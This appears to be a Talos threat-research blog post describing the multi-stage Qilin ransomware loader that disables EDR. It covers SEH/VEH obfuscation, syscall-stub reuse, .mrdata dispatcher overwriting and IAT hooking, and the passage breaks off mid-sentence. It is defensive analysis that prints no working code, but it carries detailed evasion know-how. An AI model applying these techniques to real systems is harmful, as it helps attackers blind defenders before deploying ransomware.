]]></content:encoded></item><item><title><![CDATA[Qilin EDR killer infection chain]]></title><description><![CDATA[This blog provides an in-depth analysis of the malicious “msimg32.dll” used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems.]]></description><link>https://blog.talosintelligence.com/qilin-edr-killer/</link><guid isPermaLink="false">69ca3f6e9610580001d2fbb9</guid><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Email Filtering]]></category><category><![CDATA[Reverse Engineering]]></category><category><![CDATA[malware]]></category><dc:creator><![CDATA[Takahiro Takeda]]></dc:creator><pubDate>Thu, 02 Apr 2026 10:00:56 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/EDR-Killer-header-1.jpg" medium="image"/><content:encoded><![CDATA[<ul><li>Endpoint detection and response (EDR) tools are widely deployed and far more capable than traditional antivirus. As a result, attackers use EDR killers to disable or bypass them.</li><li>Disabling telemetry collection (process, memory, network activity) limits what defenders can see and analyze.</li><li>As defenders improve behavioral detection, attackers increasingly target the defense layer itself as part of their initial access or early execution stages.</li><li>This blog provides an in-depth analysis of the malicious &#x201C;msimg32.dll&#x201D; used in Qilin ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can terminate over 300 different EDR drivers from almost every vendor in the market.</li><li>We present multiple techniques used by the malware to evade and ultimately disable EDR solutions, including SEH/VEH-based obfuscation, kernel object manipulation, and various API and system call bypass methods.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/EDR-Killer-header-1.jpg" alt="Qilin EDR killer infection chain"><p>This blog post provides an in-depth technical analysis of the malicious dynamic-link library (DLL) &#x201C;msimg32.dll&#x201D;, which Cisco Talos observed being deployed in Qilin ransomware attacks. The broader activities and attacks of Qilin was previously introduced and described in the blog post <a href="https://blog.talosintelligence.com/an-overview-of-ransomware-threats-in-japan-in-2025-and-early-detection-insights-from-qilin-cases" rel="noreferrer">here</a>.</p><p>This DLL represents the initial stage of a sophisticated, multi-stage infection chain designed to disable local endpoint detection and response (EDR) solutions present on compromised systems. Figure 1 shows a high-level diagram demonstrating the overall execution flow of this infection chain.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image1-1.jpg" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="1179" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image1-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image1-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image1-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image1-1.jpg 2000w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 1. Infection chain overview.</span></figcaption></figure><p>The first stage consists of a PE loader responsible for preparing the execution environment for the EDR killer component. This secondary payload is embedded within the loader in an encrypted form.</p><p>The loader implements advanced EDR evasion techniques. It neutralizes user-mode hooks and suppresses Event Tracing for Windows (ETW) event generation at runtime by leveraging a -like approach. Additionally, it makes extensive use of structured exception handling (SEH) and vectored exception handling (VEH) to obscure control flow and conceal API invocation patterns. This enables the EDR killer payload to be decrypted, loaded, and executed entirely in memory without triggering detection by the locally installed EDR solution.</p><p>Once active, the EDR killer component loads two helper drivers. The first driver (&#x201C;rwdrv.sys&#x201D;) provides access to the system&#x2019;s physical memory, while the second driver (&#x201C;hlpdrv.sys&#x201D;) is used to terminate EDR processes. Prior to loading the second driver, the EDR killer component unregisters monitoring callbacks established by the EDR, ensuring that process termination can proceed without interference.</p><p>Overall, the malware is capable of disabling over 300 different EDR drivers across a wide range of vendors. While the campaign has been previously reported by , , and others at a higher level, this analysis focuses on previously undocumented technical details of the infection chain (e.g., the SEH/VEH tricks and the overwriting of certain kernel objects).</p><h2 id="pe-loader-section-%E2%80%9Cmsimg32dll%E2%80%9D">PE loader section (&#x201C;msimg32.dll&#x201D;)</h2><p>The malicious DLL is most likely side-loaded by a legitimate application that imports functions from &#x201C;msimg32.dll&#x201D;. To preserve expected functionality, the original API calls are forwarded to the legitimate library located in &#x201C;C:\Windows\System32&#x201D;.</p><p>The version of &#x201C;msimg32.dll&#x201D; deployed by the threat actor triggers its malicious logic from within its <code>DllMain</code> function. As a result, the payload is executed as soon as the legitimate application loads the DLL.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image2.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1402" height="647" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image2.png 1402w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 2. Malicious version of &#x201C;msimg32.dll&#x201D;.</span></figcaption></figure><p>Sophos also gave some technical and historical insights into this loader in their earlier blog, in which it is referred to as Shanya.</p><h3 id="initialization-phase">Initialization phase</h3><p>During initialization, the loader allocates a heap buffer in process memory that acts as a slot-policy table.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image3.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="604" height="97" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image3.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image3.png 604w"><figcaption><span style="white-space: pre-wrap;">Figure 3a. Allocating buffer for slot-policy table.</span></figcaption></figure><p>The size of this buffer is computed as &quot;ntdll.dll&quot; <code>OptionalHeader.SizeOfCode</code> divided by 16 ( <code>SizeOfCode &gt;&gt; 4</code>), resulting in one byte per 16-byte code slot covering the code region as defined by <code>OptionalHeader.SizeOfCode</code> (typically the .text range). Each entry in the table corresponds to a fixed 16-byte block relative to <code>BaseOfCode</code>.</p><p>The loader then iterates over the export table of &#x201C;ntdll.dll&#x201D;. For each exported function whose name begins with &quot;Nt&quot;, the virtual address of the corresponding syscall stub is resolved. From this address, a slot index is calculated as: slot_idx = (FuncVA - BaseOfCode)/16</p><p>This index is used to mark the corresponding entry in the slot-policy table. All Nt* stubs are assigned a default policy, while selected functions are explicitly marked with special policies, including:</p><ul><li><code>NtTraceEvent</code></li><li><code>NtTraceControl</code></li><li><code>NtAlpcSendWaitReceivePort</code></li></ul><p>The result is a data-driven classification of relevant syscall stubs without modifying the executable code of &#x201C;ntdll.dll&#x201D;. The resulting slot-policy-table appears as follows:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image4.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1750" height="872" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image4.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image4.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image4.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image4.png 1750w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 3b. Slot-policy table.</span></figcaption></figure><p>The actual loader function is significantly more complex and incorporates additional obfuscation techniques, such as hash-based API resolution at runtime.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image5.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1975" height="960" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image5.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image5.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image5.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image5.png 1975w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 4. Filling slot-policy table depending on &#x201C;Nt&#x201D; syscall stub functions.</span></figcaption></figure><p>After constructing the table, the sample dynamically resolves <code>ntdll!LdrProtectMrdata</code>, which will be discussed in greater detail later. It then invokes this routine to change the protection of the <code>.mrdata</code> section to writable. This section contains the exception dispatcher callback pointer along with other critical runtime data.</p><p>Once the section is writable, the loader overwrites the dispatcher slot with its own custom exception handler. As a result, its routine is executed whenever an exception is triggered.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image6.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1628" height="392" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image6.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image6.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image6.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image6.png 1628w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 5. Overwriting of exception handler dispatcher slot.</span></figcaption></figure><h3 id="runtime-exception-handling">Runtime exception handling</h3><p>This function primarily performs two tasks: handling breakpoint exceptions and single-step exceptions.</p><p>The handling of breakpoint exceptions (0xCC) is relatively straightforward. It simply resumes execution at the instruction immediately following the INT3 (0xCC). Talos is not certain why this approach was implemented. It may function as a lightweight anti-emulation, anti-analysis, or anti-sandbox mechanism for weak analysis systems, serve as groundwork for more advanced anti-debugging techniques, or act as preparation for future control-flow manipulation similar to the VEH-based logic observed in Stages 2 and 3.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image7.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1228" height="458" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image7.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image7.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image7.png 1228w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 6. Breakpoint logic of </span><code spellcheck="false" style="white-space: pre-wrap;"><span>hook_function_ExceptionCallback</span></code><span style="white-space: pre-wrap;"> function.</span></figcaption></figure><p>The single-step portion of the function is significantly more complex and is where the previously introduced slot-policy table is utilized. <code>ctx-&gt;ntstub_class_map</code> points to the map buffer allocated during initialization.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image8.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1583" height="1688" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image8.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image8.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image8.png 1583w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 7. Single step logic of </span><code spellcheck="false" style="white-space: pre-wrap;"><span>hook_function_ExceptionCallback</span></code><span style="white-space: pre-wrap;"> function.</span></figcaption></figure><p>Simplified the logic of the initialization and dispatch function looks like this in pseudo code. <code>InitCtxAndPatchNtdllMrdataDispatch</code> is the initialization function and <code>hook_function_ExceptionCallback</code> is the dispatch function mentioned above.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image9.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="822" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image9.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image9.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image9.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image9.png 2242w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 8. Simplified single step SEH logic.</span></figcaption></figure><p>The <code>find_syscall</code> routine shown in Figure 7 implements a syscall recovery technique. Details can be found in the picture below. It scans both backward and forward through &#x201C;ntdll.dll&#x201D; to locate intact syscall stubs and identify neighboring syscalls that can be repurposed.</p><p>The simplified logic is as follows:</p><ul><li>Indirectly determine the target syscall number by scanning forward and backward.</li><li>Locate a clean neighbouring stub.</li><li>Manually load the correct syscall ID into <code>eax</code>.</li><li>Transition directly to kernel mode using the syscall instruction (i.e., a syscall instruction located inside a clean neighboring stub).</li></ul><p>By reusing a neighboring syscall stub to invoke the desired system call, the loader bypasses EDR-hooked syscalls without modifying the hooked code itself. The Windows kernel only evaluates the syscall ID in <code>eax</code>; it does not verify which exported API function initiated the call.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image10.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1408" height="1685" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image10.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image10.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image10.png 1408w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 9. Halo&#x2019;s Gate: </span><code spellcheck="false" style="white-space: pre-wrap;"><span>find_syscall</span></code><span style="white-space: pre-wrap;"> function.</span></figcaption></figure><p>As previously mentioned, the actual code of the malware is more complex (e.g., the aforementioned runtime resolution of <code>ntdll!LdrProtectMrdata</code>).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image11.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1516" height="1254" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image11.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image11.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image11.png 1516w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 10. Resolution of </span><code spellcheck="false" style="white-space: pre-wrap;"><span>ntdll!LdrProtectMrdata</span></code><span style="white-space: pre-wrap;"> at runtime.</span></figcaption></figure><p>The loader resolves the <code>ntdll!LdrProtectMrdata</code> function in a stealthy way. Instead of resolving <code>LdrProtectMrdata</code> by name or hash, the loader instead:</p><ul><li>Finds the .mrdata section in the &#x201C;ntdll.dll&#x201D; image</li><li>Checks whether the current dispatcher slot pointer (<code>dispatch_slot</code>) lies inside .mrdata</li><li>If it does, it uses a known exported ntdll function (<code>RtlDeleteFunctionTable</code>, located via hash) as an anchor</li><li>From that anchor, it scans for a CALL rel32 instruction (0xE8) and extracts its target address</li><li>That call target is the address of <code>LdrProtectMrdata</code> and stored in <code>ctx-&gt;LdrProtectMrdata</code></li></ul><p>The initialization routine described earlier also incorporates several basic anti-debugging measures. For example, it verifies whether a breakpoint has been placed on <code>KiUserExceptionDispatcher</code>. If such a breakpoint is detected, the process is deliberately crashed. This check is performed before the dispatcher is overwritten, which means that the resulting exception is handled by the original, default exception handler.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image12.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1507" height="221" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image12.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image12.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image12.png 1507w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 11. </span><code spellcheck="false" style="white-space: pre-wrap;"><span>KiUserExceptionDispatcher</span></code><span style="white-space: pre-wrap;"> breakpoint check.</span></figcaption></figure><p>The loader also implements geo-fencing. It excludes systems configured for languages commonly used in post-Soviet countries. This check is performed at an early stage, and the loader terminates if a locale from the exclusion list is detected.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image13.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="902" height="371" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image13.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image13.png 902w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 12. Geo-fencing function.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image14.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1189" height="724" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image14.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image14.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image14.png 1189w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 13. Geo-fencing excluded countries list.</span></figcaption></figure><p>After initializing Stage 1, the loader proceeds to unpack the subsequent stages. It creates a paging file-backed section and maps two views of this section into the process address space. This aspect was not analyzed in depth; however, creating two views of the same section is a common malware technique used to obscure a READ-WRITE-EXECUTABLE memory region. Typically, one view is configured with WRITE access only, masking the effective executable permissions of the underlying section. This shared memory region will contain subsequent malware stages after unpacking them. This also makes it more difficult to dump the memory during analysis. When a virtual memory page is not currently present in RAM (present bit cleared), accessing it triggers a page fault. The kernel then resolves the fault (e.g., by loading the page from the pagefile into physical memory).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image15.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1545" height="258" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image15.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image15.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image15.png 1545w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 14. </span><code spellcheck="false" style="white-space: pre-wrap;"><span>CreateFileMappingA</span></code><span style="white-space: pre-wrap;"> resolver function, returns the handle 0x174.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image16.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1759" height="51" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image16.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image16.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image16.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image16.png 1759w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 15. First &#x201C;write only&#x201D; view, </span><code spellcheck="false" style="white-space: pre-wrap;"><span>FILE_MAP_WRITE</span></code><span style="white-space: pre-wrap;"> (0x2).</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image17.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1759" height="56" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image17.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image17.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image17.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image17.png 1759w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 16. Second &#x201C;R-W-X&#x201D; view, </span><code spellcheck="false" style="white-space: pre-wrap;"><span>0x24 = FILE_MAP_READ (0x4) | FILE_MAP_EXECUTE (0x20)</span></code><span style="white-space: pre-wrap;">.</span></figcaption></figure><p>After creating the views, it copies and decodes bytes into this buffer. The basic block highlighted in green marks the start of this routine, while the red basic block represents the final control transfer (see Figure 17) to the decoded payload. The yellow basic block contains the decision logic that determines when execution transitions to the red basic block.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image18.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="334" height="1098"><figcaption><span style="white-space: pre-wrap;">Figure 17. Stage 2 decoding routine.</span></figcaption></figure><p>Inside the red basic block, we have the final jump into the decoded bytes of Stage 2.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image19.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1184" height="403" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image19.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image19.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image19.png 1184w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 18. Call to Stage 2 in red basic block.</span></figcaption></figure><h3 id="stage-2">Stage 2</h3><p>Stage 2 (0x2470000) serves solely as a stealthy transition mechanism to transfer execution to Stage 3. As expected, all addresses referenced from this point onward, such as 0x2470000, may vary between executions of the loader, as they are dynamically allocated at runtime.</p><p>The initial part of Stage 2 is straightforward: It decodes the data stored in the memory section and then unmaps the previously mapped view. The subsequent function call constitutes the critical step: <code>ctx-&gt;FuncPtrHookIAT((ULONGLONG)ctx-&gt;hooking_func);</code></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image20.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1754" height="922" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image20.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image20.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image20.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image20.png 1754w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 19. Stage 2.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image21.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="2000" height="1097" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image21.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image21.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/image21.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image21.png 2018w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 20. IAT hooking function.</span></figcaption></figure><p>This IAT-hooking routine overwrites the <code>ExitProcess</code> entry in the Import Address Table (IAT) of the main process (i.e., the process that loaded the malicious &#x201C;msimg32.dll&#x201D;).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image22.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="638" height="109" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image22.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image22.png 638w"><figcaption><span style="white-space: pre-wrap;">Figure 21. Overwritten IAT pointer to </span><code spellcheck="false" style="white-space: pre-wrap;"><span>ExitProcess</span></code><span style="white-space: pre-wrap;"> at 0x140017138.</span></figcaption></figure><p>As shown in Figure 18, execution returns normally from Stage 2, and <code>DllMain</code> completes without any obvious anomalies. The malicious logic is triggered later, when <code>ExitProcess</code> is invoked by <code>exit_or_terminate_process</code> during process termination. Instead of terminating the process, execution is redirected to function 0x2471000, which corresponds to Stage 3.</p><h3 id="stage-3">Stage 3</h3><p>Stage 3 primarily decompresses and loads a PE image from memory that was originally embedded within the malicious &#x201C;msimg32.dll&#x201D;. It begins by resolving syscall stubs, which are used in subsequent code sections followed by decoding routines.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image23.png" class="kg-image" alt="Qilin EDR killer infection chain" loading="lazy" width="1299" height="760" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/image23.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/image23.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/image23.png 1299w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure 22. Syscall resolution and execution of certain 